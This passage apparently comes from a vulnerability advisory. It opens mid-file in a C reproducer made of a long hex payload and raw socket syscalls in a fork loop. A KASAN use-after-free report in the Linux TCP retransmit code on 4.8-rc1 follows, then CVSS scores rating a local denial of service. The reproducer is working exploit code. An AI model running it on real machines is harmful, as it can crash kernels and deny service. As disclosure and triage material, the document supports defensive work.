e\xd0\xea\x0b\x55\x0b\x71\xfa\x69\xda\x9d\x35\x10\x70\x32\x68\xe8\xde\x47\x74\x1f\xc6\x60\x86\xbd\x15\x1c\x6b\x52\xeb\xe4\x04\x0f\x8c\x70\x2f\x8d\x6d\x7e\x5f\xfd\xe7\xd1\x87\x80\x76\xd8\x7a\x2c\xbf\xb2\x98\x12\x83\x81\x94\x11\x7d\x1c\x90\xfd\xf0\xdc\xe6\x9d\xee\x76\xde\x50\xcb\x97\x25\xca\x88\xd8\x70\x97\x40\x25\x94\xc5\xfe\x8b\x44\x05\x8d\x6e\x7f\xab\xc3\x27\xd8\x0e\x4a\x30\xb5\xfb\x95\xf8\x34\x75\x01\x1f\xe6\xac\x81\x1b\x13\x63\xb7\x60\xb8\x1c\x3b\xda\x07\x26\x9e\xfd\xeb\x7f\x43\x46\x93\x75\x63\xdc\xa7\xe9\xc1\x8f\xa9\x06\x96\xe7\x10\x87\xb4\x32\x4a\x30\x69\xd2\xf4\x2b\x5d\x76\xa3\x94\x6b\x72\xd9\xc6\xfa\x6a\x49\x12\xc7\xc2\x74\x3f\xc4\x39\x9f\xa0\x7e\xcd\x81\x9c\x54\x0f\x14\xce\xd3\x7e\xd8\xe8\xd2\xc2\x24\x2e\xc5\x1b\x58\xf8\x8e\xe6\xaa\x16\x69\x6c\x4b\x40\x86\x1a\x1a\xad\x11\x6f\x90\x48\x68\x93\xb1\x8f\xbd\xaf\x8d\x00\x09\x5e\xf4\xe3\x03\x59\xff\x8f\xf5\xf0\xe2\xa1\x79\x93\xf5\x76\xcb\x56\x93\xb8\xe6\x22\xe5\x69\x90\x3d\x0f\x9b\x57\x86\x19\xf7\x63\xd5\x2c\xfe\xad\x63\x60\x9e\x9e\x29\x04\xe9\x4d\xb6\xd9\xb1\xdb\x42\x2d\x8b\x8d\x6d\xdd\xae\x0b\xca\x58\x38\xf4\x30\xad\xae\xa3\x3d\x64\x47\xe0\x77\xc3\xed\xc8\xe0\x7d\x3c\x6c\xda\xbd\x47\x5e\x37\xb4\xe4\xb8\x1c\x69\x16\xb6\xd5\x8b\x9a\x15\xfa\x6b\x21\x88\x74\xbb\xdf\xe3\xbe\x31\x02\x8e\x82\x81\x10\x98\x24\x74\x04\xad\xe3\xc5\x63\x57\x0d\x58\xbe\x1c\x97\xa1\x0d\xb6\x55\x83\x18\x41\x37\xa7\x1b\x51\x37\x13\x99\xeb\x6f\xe3\x70\xc2\x4a\x8c\x17\xc6\x30\x8d\x01\xfe\xd4\x71\x4c\xee\x82\x94\xe4\x1d\x9a\x8a\xed\x48\x61\xba\x6c\x63\x5f\x3b\x13\x9f\x5b\xe4\x0b\x2c\x44\x1c\xb7\xf6\xc7\x64\xf6\x74\x4a\x16\x7a\x35\xf7\x2e\x9d\x4f\x00\x38\xa7\xad\xe7\x17\x0c\xb7\x3f\x02\x41\xe9\xa3\x37\x5b\x98\xd5\x0f\xc6\xe6\xd1\x38\x4e\x87\x4f\x2f\x02\xa1\x27\x4d\xb2\x03\xfc\x50\x48\xaa\x33\x92\xe1\x10\xa6\x0b\xb0\x20\x7c\x57\xd4\x85\x55\x51\x6e\x7e\xdf\xa2\x46\xf5\x94\x93\x03\x02\xdb\x94\x55\x23\xd9\x5b\x99\x2b\x3a\x7e\x7d\xb1\x80\x47\xf9\x77\xee\x0f\x5e\x63\x7f\x1e\x96\xdf\xf9\x1c\x81\x55\xdd\x02\x81\x87\xc8\x04\x52\x59\x49\xd4\x08\xd5\x73\x43\x3f\xd2\xf9\xa9\xf0\xd7\xb9\x97\x86\x9c\x0a\xc6\x7d\x5a\x98\x88\x2b\x0b\x38\xa1\xcb\xf8\x71\xc7\x5d\xfe\xba\xd0\x26\x4b\xdf\xb8\x11\x8f\x71\x60\x68\xc7\x82\xd0\x36\x97\x23\x56\xda\x52\x58\x90\x0a\x42\x0b\xfc\xf8\xc9\x1f\x36\x7f\x9f\xe5\x5b\xf8\x6e\xe1\x78\x47\xfe\x6b\x00\xcd\xe5\x6b\xe2\xa6\xaf\x2b\x33\x95\x73\x79\x52\x13\x1c\x87\x3d\x8d\xbc\x32\x1e\x11\x25\x91\x51\xa0\xaf\xcc\xf1\xc3\x5a\xea\x8b\x15\x82\x76\xa9\x0f\xe7\x08\x73\x53\x02\x4c\x8c\xb2\x8d\x4b\xa0\xed\x37\x20\x7f\x54\xa2\x2a\x33\x6b\x5f\x3a\x4f\x54\x61\x85\x91\x86\x68\x5a\xd4\x80\xc9\x21\xa9\x16\x5d\x77\xee\x28\xeb\xc2\x5c\x22\xe4\x27\xdb\x5b\xe4\xa7\x70\xdc\x6a\x8e\xd9\xe7\x77\x09\x5b\x94\x97\xc6\xf4\x1f\x7a\x35\x9e\x26\x1e\x8b\x37\xe3\xa4\xdc\x0a\x8a\x19\x59\x3a\x77\x81\x2d\x9b\x0e\x51\x2b\xd7\xc5\xbc\x07\xfa\xf3\x29\x79\x35\x98\xe3\xb8\xf7\xe5\x40\xdf\xa8\x93\x00\xf6\x53\x8c\xcc\x33\xdf\x0e\x35\x3e\x72\x8d\x48\x85\x05\x40\x43\xe1\x13\xd6\x4a\x95\x50\xf8\x32\xca\xc3\x1c\x28\xd4\x41\x15\x64\xc1\x08\xfb\x2c\xc2\x1f\x79\x30\x58\xaa\x7c\x0d\x83\x8e\x87\xf4\x2e\xa3\xfc\xeb\xd0\xdb\xcc\x15\xcd\x88\x99\x41\x75\x13\xc1\x0c\x53\x96\xfe\xff\xeb\x87\x6a\x04\x75\xf2\x98\x40\x7e\xc7\x4e\x47\x63\x31\x2f\xb2\xa2\x88\x30\xca\x49\xfb\x57\x40\x65\x8c\xc9\x80\x20\xb9\xc9\xfc\x79\x12\x8d\xe6\x24\x24\x5f\x38\x47\x3c\x93\x64\x41\x9a\xf2\xe8\xab\xc1\xaf\x13\x95\x5c\x26\x4e\x02\x99\x5f\x6a\xe3\xd4\x91\x0a\xf5\x06\x3a\x2d\xc9\x22\x96\x6b\xa0\x77\x00\x77\x7c\x26\xdc\xb6\xc1\x1b\x6c\xc8\xfe\x43\x2c\xe2\xdc\x58\x7e\x30\x38\x98\x97\xdf\xda\xae\x9d\x40\x94\xb7\x16\x91\x66\x94\x6c\x2a\x50\x39\x69\xce\xb4\x5c\xec\x2e\x60\x71\x92\xa3\x14\x1f\x08\x70\xcb\x9c\x47\x5b\xf3\xf4\xea\x7a\x34\x43\x32\x8b\x19\x57\xd2\xe7\x1c\xc5\xeb\xa5\x66\x37\x73\x80\x59\xac\x1e\xc0\x2f\xf1\x30\xf4\xd0\xc7\x78\x2b\x38\xd3\xab\x74\xfd\x4d\xdf\x5e\xc5\xa7\x89\x1b\xb7\x76\xf5\xf9\xfd\xca\xfc\xc2\x0d", 4096);
        r[53] = syscall(SYS_sendto, r[10], 0x20015285ul, 0x1000ul, 0xc080ul, 0x0ul, 0x0ul);
        r[54] = syscall(SYS_mmap, 0x20022000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
        *(uint32_t*)0x20022fdd = (uint32_t)0x28;
        *(uint32_t*)0x20022fe1 = (uint32_t)0x400;
        *(uint64_t*)0x20022fe5 = (uint64_t)0x0;
        *(uint64_t*)0x20022fed = (uint64_t)0x8ab;
        *(uint64_t*)0x20022ff5 = (uint64_t)0xfffffffffffffffb;
        *(uint16_t*)0x20022ffd = (uint16_t)0x5;
        r[61] = syscall(SYS_write, r[10], 0x20022fddul, 0x28ul, 0, 0, 0);
        } else if (pid > 0) {
            int returnStatus;
            waitpid(pid, &returnStatus, 0);
            printf("collected child\n");
        } else {
            printf("fork failed\n");
            exit(1);
        }
    }
    return 0;
}


// KASAN report on v4.8-rc1, equivalent on master

/*
[   21.446876] BUG: KASAN: use-after-free in tcp_xmit_retransmit_queue+0xc75/0xdb0 at addr ffff88007a06d428
[   21.447953] Read of size 4 by task rsyslogd/1612
[   21.448465] CPU: 0 PID: 1612 Comm: rsyslogd Tainted: G    B           4.8.0-rc1 #1
[   21.449263] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[   21.450270]  0000000000000000 0000000015e55fbd ffff88007dc07268 ffffffff81bef151
[   21.451135]  ffff88011cfb0d80 ffff88007a06d400 ffff88007a06d5a8 ffff88007a06d400
[   21.452002]  ffff88007dc07290 ffffffff815d0351 ffff88007dc07328 ffff88007a06d400
[   21.452873] Call Trace:
[   21.453142]  <IRQ>  [<ffffffff81bef151>] dump_stack+0x83/0xb2
[   21.453835]  [<ffffffff815d0351>] kasan_object_err+0x21/0x70
[   21.454450]  [<ffffffff815d05f4>] kasan_report_error+0x204/0x500
[   21.455135]  [<ffffffff815d0a31>] __asan_report_load4_noabort+0x61/0x70
[   21.455899]  [<ffffffff82a90f55>] ? tcp_xmit_retransmit_queue+0xc75/0xdb0
[   21.456624]  [<ffffffff82a90f55>] tcp_xmit_retransmit_queue+0xc75/0xdb0
[   21.457329]  [<ffffffff82a53aba>] tcp_xmit_recovery.part.54+0x2a/0x120
[   21.458028]  [<ffffffff82a69c96>] tcp_ack+0x2716/0x4ed0
[   21.458590]  [<ffffffff815cf6e6>] ? save_stack+0x46/0xd0
[   21.459189]  [<ffffffff815cf95d>] ? kasan_kmalloc+0xad/0xe0
[   21.459804]  [<ffffffff82a67580>] ? tcp_fastretrans_alert+0x2dc0/0x2dc0
[   21.460540]  [<ffffffff82a5a63f>] ? tcp_parse_options+0x18f/0xb20
[   21.461237]  [<ffffffff811ea161>] ? ttwu_do_wakeup+0x21/0x2d0
[   21.461865]  [<ffffffff82a6e8b1>] ? tcp_validate_incoming+0x821/0x1210
[   21.462581]  [<ffffffff81c0e93e>] ? put_dec+0x2e/0xc0
[   21.463167]  [<ffffffff82a74201>] tcp_rcv_established+0x5b1/0x20c0
[   21.463884]  [<ffffffff815cfaa5>] ? memcpy+0x45/0x50
[   21.464414]  [<ffffffff828ec80a>] ? __copy_skb_header+0x19a/0x1f0
[   21.465057]  [<ffffffff82a73c50>] ? tcp_data_queue+0x4240/0x4240
[   21.465719]  [<ffffffff828eca97>] ? __skb_clone+0x237/0x7a0
[   21.466326]  [<ffffffff815cbed8>] ? kmem_cache_alloc+0xb8/0x1b0
[   21.466954]  [<ffffffff82baa6b7>] ? rt6_check_expired+0xa7/0x120
[   21.467591]  [<ffffffff82bae7f2>] ? ip6_dst_check+0x262/0x410
[   21.468231]  [<ffffffff82c0ff52>] tcp_v6_do_rcv+0x642/0x13c0
[   21.468836]  [<ffffffff82c148d2>] tcp_v6_rcv+0x1a32/0x2550
[   21.469462]  [<ffffffff81233abb>] ? trigger_load_balance+0x3fb/0x8b0
[   21.470179]  [<ffffffff82beaa55>] ? raw6_local_deliver+0x555/0x6f0
[   21.470953]  [<ffffffff82b82dec>] ip6_input_finish+0x2ac/0xd50
[   21.471600]  [<ffffffff82b8396a>] ip6_input+0xda/0x1f0
[   21.472149]  [<ffffffff81117670>] ? kvm_guest_apic_eoi_write+0x70/0x90
[   21.472870]  [<ffffffff82b83890>] ? ip6_input_finish+0xd50/0xd50
[   21.473521]  [<ffffffff8128a722>] ? handle_fasteoi_irq+0x362/0x6a0
[   21.474210]  [<ffffffff810f56c0>] ? ioapic_ir_ack_level+0xd0/0xd0
[   21.474858]  [<ffffffff82b8291e>] ip6_rcv_finish+0x11e/0x340
[   21.475487]  [<ffffffff82b84806>] ipv6_rcv+0xd86/0x1750
[   21.476043]  [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0
[   21.476615]  [<ffffffff82cadeb5>] ? _raw_spin_unlock_irqrestore+0x15/0x20
[   21.477332]  [<ffffffff815d03d7>] ? kasan_end_report+0x37/0x50
[   21.478956]  [<ffffffff815d0825>] ? kasan_report_error+0x435/0x500
[   21.479618]  [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0
[   21.480250]  [<ffffffff8293926f>] __netif_receive_skb_core+0x15df/0x26c0
[   21.481017]  [<ffffffff812092c0>] ? update_curr+0x150/0x4e0
[   21.481700]  [<ffffffff82937c90>] ? netdev_info+0x120/0x120
[   21.482339]  [<ffffffff812bf12b>] ? hrtimer_active+0x1db/0x280
[   21.482969]  [<ffffffff81206b3d>] ? cpu_load_update+0x1bd/0x350
[   21.483619]  [<ffffffff81227f2c>] ? task_tick_fair+0x119c/0x2420
[   21.484295]  [<ffffffff810fddf1>] ? __x2apic_send_IPI_dest.constprop.4+0x31/0x40
[   21.485101]  [<ffffffff810fe072>] ? x2apic_send_IPI+0x72/0xa0
[   21.485739]  [<ffffffff8293a37f>] __netif_receive_skb+0x2f/0x170
[   21.486383]  [<ffffffff8293e1a7>] process_backlog+0x197/0x580
[   21.487021]  [<ffffffff8293bc9a>] net_rx_action+0x6ca/0xbb0
[   21.487615]  [<ffffffff8293b5d0>] ? sk_busy_loop+0x7b0/0x7b0
[   21.488258]  [<ffffffff8111850e>] ? kvm_clock_get_cycles+0x1e/0x20
[   21.488909]  [<ffffffff812d3e90>] ? ktime_get+0xb0/0x110
[   21.489471]  [<ffffffff810fdc1b>] ? native_apic_msr_write+0x2b/0x30
[   21.490147]  [<ffffffff812e3ca6>] ? clockevents_program_event+0x246/0x340
[   21.490868]  [<ffffffff82cb121e>] __do_softirq+0x1ce/0x57d
[   21.491470]  [<ffffffff811769d7>] irq_exit+0x117/0x140
[   21.492035]  [<ffffffff82cb0dd0>] smp_apic_timer_interrupt+0x80/0xa0
[   21.492712]  [<ffffffff82caf062>] apic_timer_interrupt+0x82/0x90
[   21.493378]  <EOI> Object at ffff88007a06d400, in cache skbuff_fclone_cache size: 424
[   21.494277] Allocated:
[   21.494538] PID = 1711
[   21.494801]  [<ffffffff810b308b>] save_stack_trace+0x2b/0x50
[   21.495416]  [<ffffffff815cf6e6>] save_stack+0x46/0xd0
[   21.495970]  [<ffffffff815cf95d>] kasan_kmalloc+0xad/0xe0
[   21.496572]  [<ffffffff815cfe92>] kasan_slab_alloc+0x12/0x20
[   21.497185]  [<ffffffff815cc51e>] kmem_cache_alloc_node+0xfe/0x1d0
[   21.497853]  [<ffffffff828f21f2>] __alloc_skb+0xd2/0x5d0
[   21.498475]  [<ffffffff82a480fd>] sk_stream_alloc_skb+0xbd/0x790
[   21.499129]  [<ffffffff82a4b464>] tcp_sendmsg+0x13f4/0x2d10
[   21.499754]  [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350
[   21.500371]  [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110
[   21.500988]  [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0
[   21.501625]  [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640
[   21.502249]  [<ffffffff8162e315>] vfs_write+0x175/0x4a0
[   21.502838]  [<ffffffff81631b78>] SyS_write+0xd8/0x1b0
[   21.503429]  [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[   21.504144] Freed:
[   21.504368] PID = 1711
[   21.504628]  [<ffffffff810b308b>] save_stack_trace+0x2b/0x50
[   21.505290]  [<ffffffff815cf6e6>] save_stack+0x46/0xd0
[   21.505879]  [<ffffffff815cff13>] kasan_slab_free+0x73/0xc0
[   21.506501]  [<ffffffff815cb70c>] kmem_cache_free+0x7c/0x210
[   21.507128]  [<ffffffff828eba3b>] kfree_skbmem+0x7b/0xf0
[   21.507752]  [<ffffffff828f3e22>] __kfree_skb+0x22/0x30
[   21.508339]  [<ffffffff82a4b8ad>] tcp_sendmsg+0x183d/0x2d10
[   21.508962]  [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350
[   21.509574]  [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110
[   21.510194]  [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0
[   21.510818]  [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640
[   21.511408]  [<ffffffff8162e315>] vfs_write+0x175/0x4a0
[   21.512003]  [<ffffffff81631b78>] SyS_write+0xd8/0x1b0
[   21.512562]  [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[   21.513258] Memory state around the buggy address:
[   21.513770]  ffff88007a06d300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[   21.514546]  ffff88007a06d380: 00 00 00 00 00 fc fc fc fc fc fc fc fc fc fc fc
[   21.515310] >ffff88007a06d400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   21.516114]                                   ^
[   21.516611]  ffff88007a06d480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   21.517400]  ffff88007a06d500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   21.518203] ==================================================================
*/

5.5 Medium

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

4.9 Medium

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:N/I:N/A:C